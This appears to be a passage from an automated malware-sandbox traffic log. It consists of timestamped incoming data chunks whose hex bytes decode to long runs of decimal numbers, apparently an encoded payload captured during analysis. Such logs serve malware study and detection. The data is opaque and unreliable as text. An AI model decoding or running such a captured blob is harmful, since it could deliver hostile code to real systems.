                    2021-10-26 16:59:38 UTC1772INData Raw: 34 39 20 34 38 20 35 30 20 38 39 20 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 31 31 36 20 34 38 20 35 30 20 35 30 20 35 39 20 36 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 31 37 36 20 31 31 37 20 35 34 20 38 34 20 31 31 38 20 37 37 20 35 36 20 31 34 33 20 32 30 35 20 32 30 37 20 31 37 38 20 31 35 20 38 34 20 31 31 34 20 31 31 33 20 38 35 20 33 39 20 32 30 35 20 32 30 37 20 32 30 35 20 31 38 32 20 31 31 30 20 31 31 34 20 31 31 37 20 31 30 35 20 37 32 20 31 30 37 20 32 30 37 20 32 30 35 20 32 30 31 20 38 34 20 31 31 33 20 36 39 20 31 31 30 20 31 31 32 20 32 30 38 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 34 20 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 30 35 20 38 34 20 31 38 39 20 31 31 30 20 32
                    Data Ascii: 49 48 50 89 24 114 117 107 14 116 48 50 50 59 61 117 109 118 24 176 117 54 84 118 77 56 143 205 207 178 15 84 114 113 85 39 205 207 205 182 110 114 117 105 72 107 207 205 201 84 113 69 110 112 208 48 50 54 84 114 117 109 14 9 48 50 50 116 205 84 189 110 2
                    2021-10-26 16:59:38 UTC1774INData Raw: 30 39 20 31 31 32 20 35 30 20 32 39 20 35 30 20 35 34 20 36 39 20 31 20 31 38 33 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 34 20 32 33 37 20 39 33 20 35 30 20 34 38 20 35 34 20 32 39 20 38 34 20 31 32 20 31 31 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 32 34 31 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 31 31 20 31 37 34 20 38 31 20 37 38 20 37 36 20 35 34 20 38 34 20 31 31 38 20 38 35 20 32 33 36 20 38 32 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 31 38 30 20 35 30 20 34 38 20 35 36 20 34 30 20 31 32 31 20 31 32 32 20 38 33 20 31 32 33 20 31 31 30 20 33 31 20 35 34 20 32 30 20 32 39 20 37 34 20 31 32 37 20 39 34 20 31 35 35 20 31 32 34 20 32 35 20 32 30 30 20
                    Data Ascii: 09 112 50 29 50 54 69 1 183 109 112 56 39 31 53 114 89 114 237 93 50 48 54 29 84 12 11 109 112 54 24 241 54 84 120 88 111 174 81 78 76 54 84 118 85 236 82 226 46 26 201 84 114 115 69 180 50 48 56 40 121 122 83 123 110 31 54 20 29 74 127 94 155 124 25 200
                    2021-10-26 16:59:38 UTC1775INData Raw: 31 37 20 31 30 37 20 31 30 33 20 32 34 20 33 35 20 35 35 20 31 34 20 31 32 35 20 31 34 31 20 31 33 38 20 31 34 36 20 39 39 20 35 34 20 38 20 32 20 32 30 31 20 31 37 31 20 31 34 31 20 39 39 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 32 35 20 31 30 39 20 31 31 32 20 35 30 20 33 31 20 35 30 20 35 34 20 36 39 20 31 30 30 20 31 31 39 20 32 32 37 20 31 39 39 20 33 37 20 31 30 35 20 34 30 20 32 37 20 38 33 20 38 34 20 31 30 35 20 36 34 20 31 31 38 20 32 30 20 32 37 20 31 30 31 20 35 39 20 31 32 37 20 31 33 33 20 31 32 37 20 37 30 20 31 33 36 20 34 38 20 35 34 20 31 36 38 20 36 36 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 36 20 33 31 20 34 33 20 32 30 20 35 32 20 38 32 20 31 30 31 20 34 35 20 32 34 37 20 38 38 20
                    Data Ascii: 17 107 103 24 35 55 14 125 141 138 146 99 54 8 2 201 171 141 99 71 112 50 48 33 6 80 114 25 109 112 50 31 50 54 69 100 119 227 199 37 105 40 27 83 84 105 64 118 20 27 101 59 127 133 127 70 136 48 54 168 66 255 114 117 108 106 31 43 20 52 82 101 45 247 88
                    2021-10-26 16:59:38 UTC1776INData Raw: 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 33 30 20 31 35 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 35 33 20 32 37 20 34 39 20 35 39 20 31 32 37 20 31 35 36 20 39 37 20 37 31 20 31 34 20 32 35 35 20 34 38 20 35 30 20 36 30 20 39 33 20 39 30 20 31 36 34 20 31 30 39 20 31 31 32 20 35 32 20 33 37 20 33 31 20 33 38 20 31 31 34 20 31 31 37 20 31 31 20 31 36 30 20 31 31 32 20 35 30 20 35 38 20 32 36 20 32 34 38 20 38 34 20 31 31 34 20 31 32 37 20 36 35 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 38 36 20 31 30 32 20 39 35 20 31 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 36 33 20 31 32 34 20 31 36 30 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 35 38 20 31 36 20 36 39 20 31 31 39 20 39 39 20 39 34 20 31 32 30 20 32 35 20 35 32
                    Data Ascii: 9 189 50 48 56 30 154 114 117 103 92 53 27 49 59 127 156 97 71 14 255 48 50 60 93 90 164 109 112 52 37 31 38 114 117 11 160 112 50 58 26 248 84 114 127 65 119 25 51 57 29 186 102 95 19 189 50 48 56 63 124 160 117 109 118 43 29 58 16 69 119 99 94 120 25 52
                    2021-10-26 16:59:38 UTC1778INData Raw: 31 30 35 20 39 32 20 33 34 20 35 34 20 31 38 20 31 30 37 20 31 31 38 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 38 33 20 34 38 20 35 30 20 36 30 20 31 33 38 20 31 31 34 20 39 35 20 31 30 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 31 20 31 31 37 20 38 39 20 33 33 20 35 30 20 32 31 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 38 34 20 35 30 20 35 34 20 38 34 20 37 31 20 31 31 37 20 31 30 39 20 39 37 20 33 36 20 32 34 20 31 31 36 20 35 35 20 38 34 20 31 31 36 20 31 30 39 20 36 34 20 31 31 39 20 32 30 20 34 33 20 33 31 20 34 38 20 31 31 34 20 38 39 20 36 33 20 39 37 20 39 31 20 31 39 37 20 35 39
                    Data Ascii: 105 92 34 54 18 107 118 162 107 69 143 50 48 52 30 224 114 117 107 88 83 48 50 60 138 114 95 109 113 34 48 50 54 84 111 117 89 33 50 21 116 54 84 115 102 93 116 50 84 50 54 84 71 117 109 97 36 24 116 55 84 116 109 64 119 20 43 31 48 114 89 63 97 91 197 59
                    2021-10-26 16:59:38 UTC1779INData Raw: 20 37 35 20 36 39 20 37 37 20 35 31 20 34 38 20 35 32 20 32 37 20 38 35 20 38 38 20 39 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 32 20 32 38 20 37 31 20 36 36 20 31 31 33 20 31 30 39 20 39 35 20 35 31 20 34 38 20 35 30 20 31 20 38 34 20 31 31 34 20 31 30 30 20 36 39 20 37 33 20 35 31 20 34 38 20 35 32 20 31 35 20 31 31 32 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 37 38 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 35 20 39 35 20 31 39 20 31 31 20 35 30 20 34 38 20 35 34 20 32 37 20 38 33 20 31 32 20 36 38 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 35 35 20 37 32 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 36 20 33 31 20 36 31 20 32 30 20 37 32 20 34 37 20 31 31 34 20 31 31 37 20 31 30 35 20 37 33 20 31 35 33 20 34 38 20 35 30
                    Data Ascii: 75 69 77 51 48 52 27 85 88 98 69 246 50 48 52 28 71 66 113 109 95 51 48 50 1 84 114 100 69 73 51 48 52 15 112 115 117 109 14 78 48 50 50 121 115 95 19 11 50 48 54 27 83 12 68 109 112 54 27 55 72 100 114 117 105 106 31 61 20 72 47 114 117 105 73 153 48 50
                    2021-10-26 16:59:38 UTC1780INData Raw: 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20 33 31 20 35 30 20 32 30 20 32 38 20 31 31 34 20 38 39 20 31 33 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 32 30 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 32 36 20 38 20 38 35 20 31 31 34 20 31 31 35 20 36 35 20 31 30 36 20 33 38 20 32 30 36 20 35 32 20 32 34 36 20 38 34 20 31 31 34 20 31 31 35 20 33 30 20 31 35 34 20 35 30 20 34 38 20 35 36 20 33 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 31 20 32 30 20 32 39 20 38 37 20 38 34 20 39 34 20 31 30 39 20 39 30 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 35 35 20 31 30 39 20 31 31 32 20 35 30 20 38 20 35 30 20 35 34 20 36 39 20 31 32 20 31 35 33 20 31 30 39 20 31 31 32
                    Data Ascii: 114 117 103 105 31 50 20 28 114 89 137 109 115 2 57 50 20 84 114 117 109 112 50 48 26 8 85 114 115 65 106 38 206 52 246 84 114 115 30 154 50 48 56 30 191 114 117 103 110 31 51 20 29 87 84 94 109 90 50 48 33 6 80 114 55 109 112 50 8 50 54 69 12 153 109 112
                    2021-10-26 16:59:38 UTC1782INData Raw: 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 33 31 20 35 34 20 32 30 20 32 39 20 38 32 20 31 32 31 20 39 34 20 31 33 38 20 31 32 34 20 32 35 20 34 38 20 35 38 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 34 36 20 35 36 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 39 20 33 32 20 31 32 34 20 31 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 32 30 30 20 35 30 20 35 34 20 39 34 20 31 32 31 20 31 37 31 20 39 30 20 31 32 35 20 32 35 20 32 32 32 20 35 38 20 33 36 20 38 35 20 39 30 20 31 34 30 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 30 30 20 35 34 20 38 34 20 31 32 30 20
                    Data Ascii: 9 162 107 69 143 50 48 52 30 252 114 117 103 106 31 54 20 29 82 121 94 138 124 25 48 58 30 250 114 117 103 92 46 56 26 153 84 114 127 119 93 34 22 59 32 124 133 117 109 122 26 200 50 54 94 121 171 90 125 25 222 58 36 85 90 140 109 112 56 24 200 54 84 120
                    2021-10-26 16:59:38 UTC1783INData Raw: 20 31 32 34 20 31 36 37 20 31 31 37 20 31 30 39 20 31 31 38 20 34 30 20 32 39 20 35 35 20 31 36 20 31 32 36 20 38 34 20 39 34 20 31 33 37 20 38 36 20 32 35 20 32 30 31 20 35 30 20 35 34 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 31 35 31 20 34 38 20 35 30 20 35 34 20 31 30 37 20 31 31 34 20 31 31 37 20 31 32 34 20 33 20 39 31 20 34 39 20 35 30 20 34 38 20 37 36 20 39 35 20 35 37 20 37 35 20 31 31 38 20 32 36 20 31 31 39 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 33 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 32 36 20 38 35 20 31 31 34 20 31 31 35 20 32 20 32 34 38 20 35 31 20 34 38 20 35 32 20 34 38 20 31 32 34 20 35 39 20 31 31 36 20 31 30 39 20 31 31 38 20 39 33 20 37 38 20 35 31 20 35 34 20 38 32 20 31 31 36 20 39 33 20 33 39
                    Data Ascii: 124 167 117 109 118 40 29 55 16 126 84 94 137 86 25 201 50 54 84 97 69 110 112 151 48 50 54 107 114 117 124 3 91 49 50 48 76 95 57 75 118 26 119 51 54 82 29 243 108 112 52 54 26 126 85 114 115 2 248 51 48 52 48 124 59 116 109 118 93 78 51 54 82 116 93 39
                    2021-10-26 16:59:38 UTC1784INData Raw: 34 20 33 32 20 31 32 34 20 32 34 34 20 31 31 37 20 31 30 39 20 31 31 38 20 33 36 20 32 34 20 35 34 20 35 35 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 31 31 32 20 31 31 32 20 32 34 20 31 31 32 20 35 35 20 38 34 20 31 31 36 20 39 33 20 31 37 39 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 38 38 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 37 33 20 31 30 39 20 31 31 32 20 35 30 20 36 32 20 35 30 20 35 34 20 36 39 20 39 30 20 32 33 34 20 31 30 39 20 31 31 32 20 35 32 20 33 39 20 33 31 20 37 20 31 31 34 20 38 32 20 31 30 31 20 37 33 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 31 38 36 20 32 33 32 20 31 31
                    Data Ascii: 4 32 124 244 117 109 118 36 24 54 55 84 120 95 109 112 112 24 112 55 84 116 93 179 112 50 58 26 188 84 114 115 71 112 50 48 33 6 80 114 73 109 112 50 62 50 54 69 90 234 109 112 52 39 31 7 114 82 101 73 160 44 24 205 54 84 116 115 69 70 51 48 52 186 232 11
                    2021-10-26 16:59:38 UTC1786INData Raw: 34 38 20 35 32 20 35 32 20 31 32 34 20 34 36 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 32 35 20 31 36 20 31 31 36 20 31 36 36 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 31 31 37 20 39 33 20 32 35 33 20 31 31 32 20 35 30 20 35 34 20 34 31 20 32 37 20 37 38 20 38 34 20 31 32 35 20 36 39 20 31 34 38 20 35 30 20 34 38 20 35 36 20 34 37 20 31 32 31 20 39 37 20 38 33 20 31 32 34 20 31 31 36 20 34 39 20 39 35 20 35 38 20 35 35 20 38 34 20 31 32 30 20 38 39 20 31 32 32 20 39 31 20 35 36 20 35 39 20 32 35 20 32 32 39 20 38 38 20 38 39 20 31 34 35 20 31 32 36 20 31 31 36 20 32 35 20 32 31 38 20 33 35 20 35 30 20 35 39 20 31 32 33 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 32 30 36 20 35 31 20 35 39 20 39
                    Data Ascii: 48 52 52 124 46 117 109 122 47 29 25 16 116 166 80 189 110 26 207 50 54 82 117 93 253 112 50 54 41 27 78 84 125 69 148 50 48 56 47 121 97 83 124 116 49 95 58 55 84 120 89 122 91 56 59 25 229 88 89 145 126 116 25 218 35 50 59 123 116 109 122 36 206 51 59 9
                    2021-10-26 16:59:38 UTC1787INData Raw: 36 33 20 35 37 20 32 36 20 38 37 20 38 35 20 31 31 34 20 31 31 35 20 39 37 20 31 32 31 20 39 33 20 37 33 20 35 30 20 35 34 20 39 34 20 31 31 37 20 31 32 35 20 31 32 33 20 38 38 20 37 36 20 34 38 20 35 30 20 36 30 20 36 36 20 31 34 30 20 31 31 36 20 31 30 33 20 31 37 34 20 30 20 36 31 20 32 35 20 32 35 33 20 39 35 20 38 39 20 31 36 37 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 37 31 20 31 31 38 20 31 30 30 20 31 30 35 20 38 30 20 31 31 32 20 32 31 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 32 20 35 30 20 35 34 20 38 32 20 39 30 20 32 30 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 35 36 20 36 33 20 31 32 30 20 31 31 36 20 31 32 34 20 32 20 39 20 35 30 20 34 38 20 35 36 20 32 33 34
                    Data Ascii: 63 57 26 87 85 114 115 97 121 93 73 50 54 94 117 125 123 88 76 48 50 60 66 140 116 103 174 0 61 25 253 95 89 167 72 88 126 48 50 60 71 118 100 105 80 112 21 226 40 124 141 117 109 118 26 132 50 54 82 90 20 109 112 56 238 56 63 120 116 124 2 9 50 48 56 234
                    2021-10-26 16:59:38 UTC1788INData Raw: 20 35 36 20 32 33 32 20 31 31 32 20 38 37 20 39 33 20 33 33 20 31 31 32 20 35 30 20 35 38 20 34 30 20 32 37 20 37 36 20 38 34 20 31 32 35 20 37 37 20 39 37 20 32 33 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 35 31 20 36 32 20 32 39 20 31 37 38 20 38 38 20 38 31 20 31 30 38 20 31 30 38 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 31 39 30 20 38 34 20 31
                    Data Ascii: 56 232 112 87 93 33 112 50 58 40 27 76 84 125 77 97 23 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 51 62 29 178 88 81 108 108 50 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 190 84 1
                    2021-10-26 16:59:38 UTC1790INData Raw: 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 39 32 20 38 34 20 31 31 34 20 31 31 37 20 34 32 20 31 31 32 20 35 30 20 33 33 20 37 36 20 32 31 38 20 38 34 20 31 31 34 20 31 32 37 20 31 39 20 39 35 20 35 30 20 34 38 20 35 34 20 33 32 20 35 39 20 31 35 39 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 33 30 20 31 36 20 38 33 20 31 32 20 31 30 20 31 30 39 20 31 31 32 20 35 34 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 31 20 31 31 32 20 35 30 20 35 38 20 32 36 20 33 35 20 38 35 20 31 31
                    Data Ascii: 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 92 84 114 117 42 112 50 33 76 218 84 114 127 19 95 50 48 54 32 59 159 117 109 122 46 29 30 16 83 12 10 109 112 54 78 77 54 84 120 26 131 112 50 58 26 35 85 11
                    2021-10-26 16:59:38 UTC1791INData Raw: 32 20 32 34 20 34 32 20 35 35 20 38 34 20 31 32 30 20 38 35 20 31 33 32 20 38 36 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 31 35 20 35 30 20 34 38 20 35 36 20 38 39 20 31 38 38 20 31 31 34 20 31 31 37 20 31 30 33 20 33 31 20 34 33 20 34 39 20 35 30 20 36 30 20 36 37 20 39 35 20 38 39 20 37 35 20 31 34 20 37 36 20 34 38 20 35 30 20 35 30 20 38 33 20 38 32 20 32 32 38 20 37 35 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 39 33 20 31 33 32 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 35 38 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 35 20 32 32 20 35 32 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 36 33 20 32 37 20 35 39 20 35 38 20 31 32 37 20
                    Data Ascii: 2 24 42 55 84 120 85 132 86 226 46 26 201 84 114 115 19 15 50 48 56 89 188 114 117 103 31 43 49 50 60 67 95 89 75 14 76 48 50 50 83 82 228 75 160 44 24 205 54 84 116 93 132 112 50 58 26 158 84 114 127 117 93 35 22 52 30 250 114 117 103 92 63 27 59 58 127
                    2021-10-26 16:59:38 UTC1792INData Raw: 31 30 39 20 36 34 20 39 35 20 32 30 20 37 38 20 31 32 30 20 35 34 20 38 34 20 31 31 38 20 32 36 20 31 31 39 20 31 31 33 20 35 30 20 35 38 20 32 36 20 32 20 38 35 20 31 31 34 20 31 31 35 20 36 39 20 32 33 38 20 35 30 20 34 38 20 35 32 20 33 30 20 39 37 20 31 31 35 20 31 31 37 20 31 30 37 20 38 38 20 31 37 32 20 34 38 20 35 30 20 34 38 20 34 32 20 36 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 33 37 20 32 35 20 35 36 20 32 31 32 20 35 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 33 20 31 37 38 20 31 32 32 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 37 20 32 36 20 31 34 36 20 35 30 20 35 34 20 38 32 20 31 30 30 20 31 31 20 33 39 20 31 31 32 20 35 30 20 35 32 20 39 33 20 34 35 20 38 35 20 31 31 34 20 31 32 37 20 31 32 32 20 34 31 20
                    Data Ascii: 109 64 95 20 78 120 54 84 118 26 119 113 50 58 26 2 85 114 115 69 238 50 48 52 30 97 115 117 107 88 172 48 50 48 42 69 117 109 116 30 37 25 56 212 57 117 109 116 25 253 178 122 84 114 113 70 187 26 146 50 54 82 100 11 39 112 50 52 93 45 85 114 127 122 41
                    2021-10-26 16:59:38 UTC1794INData Raw: 31 32 36 20 31 32 30 20 39 38 20 36 34 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 32 20 38 34 20 31 30 32 20 31 31 37 20 31 31 37 20 39 32 20 35 30 20 35 35 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 30 20 39 33 20 31 31 36 20 35 30 20 31 38 33 20 35 30 20 35 34 20 38 34 20 36 33 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 36 20 37 31 20 31 34 20 38 20 34 38 20 35 30 20 35 30 20 35 39 20 34 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 34 39 20 31 36 20 31 32 37 20 33 39 20 31 32 31 20 37 30 20 31 33 39 20 33 32 20 35 30 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 35 37 20 32 32 20 35 32 20 37 37 20 36 35 20 31 31 34 20 31 31 37 20 31 30 35 20 39 33
                    Data Ascii: 126 120 98 64 113 34 48 50 52 84 102 117 117 92 50 55 50 54 84 114 110 93 116 50 183 50 54 84 63 117 109 97 76 10 50 54 80 95 116 71 14 8 48 50 50 59 44 117 109 122 47 29 49 16 127 39 121 70 139 32 50 26 105 84 114 127 119 93 57 22 52 77 65 114 117 105 93
                    2021-10-26 16:59:38 UTC1798INData Raw: 39 36 20 31 32 33 20 32 34 30 20 31 31 38 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 31 30 20 38 32 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 31 31 20 35 34 20 38 34 20 31 31 38 20 38 39 20 39 20 31 34 20 31 31 20 34 38 20 35 30 20 35 30 20 35 39 20 39 30 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 33 30 20 31 37 20 32 32 20 31 39 20 38 35 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 34 32 20 37 35 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 34 20 35 31 20 35 34 20 39 34 20 32 35 34 20 35 37 20 31 30 39 20 31 31 32 20 35 31 20 32 34 20 31 31 30 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31 31 32 20 35 30 20
                    Data Ascii: 96 123 240 118 48 50 50 116 210 82 189 110 26 207 50 54 82 90 192 109 112 52 78 11 54 84 118 89 9 14 11 48 50 50 59 90 116 109 122 36 30 17 22 19 85 165 115 88 205 48 50 48 42 75 117 109 116 93 24 51 54 94 254 57 109 112 51 24 110 54 84 120 93 216 112 50
                    2021-10-26 16:59:38 UTC1802INData Raw: 20 34 37 20 34 30 20 31 32 31 20 38 35 20 38 33 20 32 20 36 32 20 35 30 20 34 38 20 35 36 20 35 33 20 35 39 20 39 33 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 31 35 37 20 35 30 20 35 34 20 39 34 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31 31 32 20 35 30 20 35 34 20 32 34 20 31 36 20 31 32 37 20 32 30 32 20 38 33 20 37 30 20 31 37 36 20 32 30 20 32 37 20 32 32 39 20 35 33 20 31 30 30 20 31 31 39 20 31 31 37 20 31 35 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 20 31 38 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 33 31 20 38 34 20 31 31 34 20 31 31 35 20 37 37 20 32 30 33 20 32 36 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34
                    Data Ascii: 47 40 121 85 83 2 62 50 48 56 53 59 93 116 109 122 26 157 50 54 94 90 192 109 112 52 78 77 54 84 120 93 216 112 50 54 24 16 127 202 83 70 176 20 27 229 53 100 119 117 15 112 50 48 50 54 84 114 11 18 112 50 58 26 131 84 114 115 77 203 26 224 44 30 171 114
                    2021-10-26 16:59:38 UTC1803INData Raw: 30 20 38 36 20 31 30 38 20 31 31 32 20 35 36 20 35 39 20 33 32 20 35 35 20 31 32 34 20 36 35 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 36 20 35 31 20 35 34 20 39 34 20 39 30 20 36 34 20 31 30 38 20 31 31 32 20 35 36 20 31 36 20 31 30 37 20 33 30 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 32 36 20 32 31 20 38 35 20 31 31 34 20 31 32 37 20 32 32 35 20 36 36 20 35 30 20 34 38 20 35 31 20 33 30 20 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 32 32 20 37 36 20 31 31 33 20 35 30 20 35 34 20 38 30 20 39 34 20 39 39 20 31 39 20 37 39 20 35 30 20 34 38 20 35 34 20 34 38 20 35 39 20 36 39 20 31 31 36 20 31 30 39 20 31 32 32 20 37 36 20 31 35 20 35 30 20 35 34 20 38 30 20 31 31 32 20 32 36 20 38 39 20 31 31 33 20 35 30 20 35
                    Data Ascii: 0 86 108 112 56 59 32 55 124 65 116 109 122 26 6 51 54 94 90 64 108 112 56 16 107 30 132 108 93 146 112 50 54 26 21 85 114 127 225 66 50 48 51 30 8 114 117 103 122 76 113 50 54 80 94 99 19 79 50 48 54 48 59 69 116 109 122 76 15 50 54 80 112 26 89 113 50 5
                    2021-10-26 16:59:38 UTC1807INData Raw: 34 38 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 31 20 35 30 20 31 33 34 20 32 34 39 20 35 34 20 32 33 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 33 33 20 30 20 34 39 20 35 34 20 31 39 36 20 31 31 34 20 31 31 37 20 31 30 39 20 34 33 20 35 30 20 34 38 20 33 35 20 33 30 20 31 31 39 20 31 31 35 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 38 20 32 30 20 37 32 20 39 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 32 20 35 36 20 32 37 20 34 39 20 36 30 20 31 32 37 20 31 33 34 20 39 33 20 32 31 35 20 31 31 32 20 35 30 20 35 34 20 37 36 20 31 31 37 20 38 34 20 31 31 34 20 31 31 33 20 38 34 20 32 37 20 35 30 20 34 38 20 35 30 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 38 20 34 39 20 35 30 20 34 38
                    Data Ascii: 48 51 38 84 114 117 109 101 50 134 249 54 23 52 117 109 113 33 0 49 54 196 114 117 109 43 50 48 35 30 119 115 117 103 110 31 58 20 72 96 114 117 105 92 56 27 49 60 127 134 93 215 112 50 54 76 117 84 114 113 84 27 50 48 50 72 23 114 117 105 31 188 49 50 48
